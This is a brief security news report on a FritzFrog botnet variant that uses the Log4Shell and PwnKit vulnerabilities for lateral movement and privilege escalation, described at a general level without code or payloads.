Security News > 2024 > February > FritzFrog botnet exploits Log4Shell, PwnKit vulnerabilities

FritzFrog botnet exploits Log4Shell, PwnKit vulnerabilities
2024-02-01 15:21

The FritzFrog cryptomining botnet has new potential for growth: a recently analyzed variant of the bot is exploiting the Log4Shell and PwnKit vulnerabilities for lateral movement and privilege escalation.

The FritzFrog botnet, initially identified in August 2020, is a peer-to-peer botnet powered by malware written in Golang.

"FritzFrog identifies potential Log4Shell targets by looking for HTTP servers over ports 8080, 8090, 8888 and 9000. To trigger the vulnerability, an attacker needs to force the vulnerable log4j application to log data containing a payload," security researcher Ori David explained.

"FritzFrog sends the Log4Shell payload in numerous HTTP headers, hoping that at least one of them gets logged by the application. This brute force exploitation approach aims to be a generic Log4Shell exploit that can affect a wide variety of applications."

Finally, FritzFrog manages to evade detection by making sure not to drop files on the disk whenever possible.

The researchers have provided a detection script enterprise defenders can use to check their SSH servers for indicators of a FritzFrog infection.


News URL

https://www.helpnetsecurity.com/2024/02/01/botnet-log4shell-pwnkit/